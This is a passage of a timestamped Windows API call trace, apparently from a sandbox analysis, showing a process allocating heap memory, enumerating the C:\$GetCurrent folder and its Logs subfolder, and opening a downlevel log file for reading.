Size=0x4) returned 0x7cf80 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f3c8 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x77180 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x771f0 [0059.551] AreFileApisANSI () returned 1 [0059.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent", lpUsedDefaultChar=0x0) returned 15 [0059.552] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.552] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0059.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0059.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x38) returned 0x78890 [0059.552] AreFileApisANSI () returned 1 [0059.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0059.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1e) returned 0x883b0 [0059.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=15 | out: lpWideCharStr="C:\\$GetCurrent") returned 15 [0059.552] CreateFileW (lpFileName="C:\\$GetCurrent" (normalized: "c:\\$getcurrent"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.552] GetLastError () returned 0x5 [0059.552] GetLastError () returned 0x5 [0059.552] SetLastError (dwErrCode=0x5) [0059.552] GetLastError () returned 0x5 [0059.552] SetLastError (dwErrCode=0x5) [0059.552] GetLastError () returned 0x5 [0059.552] SetLastError (dwErrCode=0x5) [0059.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.552] AreFileApisANSI () returned 1 [0059.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0059.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1e) returned 0x88720 [0059.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88720, cchWideChar=15 | out: lpWideCharStr="C:\\$GetCurrent") returned 15 [0059.553] CreateFileW (lpFileName="C:\\$GetCurrent" (normalized: "c:\\$getcurrent"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.553] GetLastError () returned 0x5 [0059.553] GetLastError () returned 0x5 [0059.553] SetLastError (dwErrCode=0x5) [0059.553] GetLastError () returned 0x5 [0059.553] SetLastError (dwErrCode=0x5) [0059.553] GetLastError () returned 0x5 [0059.553] SetLastError (dwErrCode=0x5) [0059.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0059.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0059.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.553] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0059.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0059.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0059.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0059.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0059.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0059.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f648 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.554] FindFirstFileExW (in: lpFileName="C:\\$GetCurrent\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78950 [0059.554] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.554] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x77260 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf60 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf60 | out: hHeap=0x20000) returned 1 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d030 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d030 | out: hHeap=0x20000) returned 1 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0059.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0059.555] AreFileApisANSI () returned 1 [0059.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs", lpUsedDefaultChar=0x0) returned 20 [0059.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0059.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0059.555] AreFileApisANSI () returned 1 [0059.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0059.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7a7b8 [0059.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x7a7b8, cchWideChar=20 | out: lpWideCharStr="C:\\$GetCurrent\\Logs") returned 20 [0059.555] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs" (normalized: "c:\\$getcurrent\\logs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.594] GetLastError () returned 0x5 [0059.594] GetLastError () returned 0x5 [0059.594] SetLastError (dwErrCode=0x5) [0059.594] GetLastError () returned 0x5 [0059.594] SetLastError (dwErrCode=0x5) [0059.594] GetLastError () returned 0x5 [0059.594] SetLastError (dwErrCode=0x5) [0059.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a7b8 | out: hHeap=0x20000) returned 1 [0059.595] AreFileApisANSI () returned 1 [0059.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0059.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7ac38 [0059.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x7ac38, cchWideChar=20 | out: lpWideCharStr="C:\\$GetCurrent\\Logs") returned 20 [0059.595] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs" (normalized: "c:\\$getcurrent\\logs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.595] GetLastError () returned 0x5 [0059.595] GetLastError () returned 0x5 [0059.595] SetLastError (dwErrCode=0x5) [0059.595] GetLastError () returned 0x5 [0059.595] SetLastError (dwErrCode=0x5) [0059.595] GetLastError () returned 0x5 [0059.595] SetLastError (dwErrCode=0x5) [0059.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac38 | out: hHeap=0x20000) returned 1 [0059.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0059.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0059.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.595] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.595] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.595] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.595] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0059.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0059.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0059.595] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0059.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0059.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0059.596] FindFirstFileExW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78610 [0059.596] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.596] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885e0 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885e0 | out: hHeap=0x20000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf60 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf60 | out: hHeap=0x20000) returned 1 [0059.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0059.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0059.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0059.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0059.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0059.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0059.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0059.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0059.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0059.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0059.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0059.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0059.597] AreFileApisANSI () returned 1 [0059.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", lpUsedDefaultChar=0x0) returned 58 [0059.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0059.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0059.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0059.597] AreFileApisANSI () returned 1 [0059.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0059.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0059.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 58 [0059.598] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0059.598] GetFileType (hFile=0x420) returned 0x1 [0059.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0059.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d030 [0059.598] GetLastError () returned 0x0 [0059.598] SetLastError (dwErrCode=0x0) [0059.598] GetLastError () returned 0x0 [0059.598] SetLastError (dwErrCode=0x0) [0059.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x316a0 [0059.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x8b218 [0059.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0059.598] GetLastError () returned 0x0 [0059.598] SetLastError (dwErrCode=0x0) [0059.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cfd0 [0059.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cfb0 [0059.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x4) returned 0x7d010 [0059.598] GetLastError () returned 0x0 [0059.599] SetLastError (dwErrCode=0x0) [0059.599] GetLastError () returned 0x0 [0059.599] SetLastError (dwErrCode=0x0) [0059.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, 